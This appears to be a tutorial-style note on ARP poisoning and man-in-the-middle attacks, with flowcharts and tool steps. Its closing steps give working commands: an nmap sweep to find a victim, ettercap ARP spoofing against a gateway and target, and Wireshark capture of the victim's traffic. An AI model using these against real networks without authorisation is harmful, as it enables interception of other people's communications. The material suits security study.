MiTM Attack

Installations


sudo apt install wireshark
sudo apt install nmap
sudo apt install ettercap-text-only

Theories

Old Router Communication Method

This old communication method is easy to hack, since it sends the every message with different distinations to everyone. Sniffing (capturing) network traffic thus was easy at the past.

Communication with MAC addresses

flowchart LR Z((Internet)) -->|Laptop Msg| A(Router); A --- C[Phone]; subgraph "Hub, Wireless Access Point" subgraph "MAC filtering" A -->|Laptop Msg| B[Laptop]; end end

ARP Poisoning and MiTM attack

Address Resolution Protocol (ARP) is a procedure for mapping a dynamic Internet Protocol address (IP address) to a permanent physical machine address in a local area network (LAN). The physical machine address is also known as a Media Access Control or MAC address.
Man-in-the-middle Attack (MiTM)
Sniffing is the process of monitoring and capturing all the packets passing through a given network using sniffing tools.

Originally,

flowchart LR A(Router) -->|"msg \n private ip: 192.168.x.5 \n mac: ABCD"| B[Victim]; B -->|"request \n private ip: 192.168.x.1 \n mac: AAAA"| A; subgraph "ip: 192.168.x.1 \n mac: AAAA" A end subgraph "ip: 192.168.x.5 \n mac: ABCD" B end

After MiTM Attack,

flowchart LR A(Router) -->|"msg \n private ip: 192.168.x.5 \n mac: BBBB"| C[Hacker]; C -->|"msg \n private ip: 192.168.x.5 \n mac: ABCD"| B[Victim]; subgraph "ip: 192.168.x.1 \n mac: AAAA" A end subgraph "ip: 192.168.x.5 \n mac: ABCD" B end subgraph "ip: 192.168.x.10 \n mac: BBBB" C end B -->|"request \n private ip: 192.168.x.1 \n mac: BBBB"| C; C -->|"request \n private ip: 192.168.x.1 \n mac: AAAA"| A;

Steps

Identify Victim MAC Address and IP Address.


nmap -sn 192.168.1.0/24

Swap addresses.


sudo ettercap -T -S -i wlan0 -M arp:remote /192.168.1.1// /target_ip//

Turn on WireShark to see captured packets. Click on wlan0 → Filter display ip "ip.addr == target ip"


sudo wireshark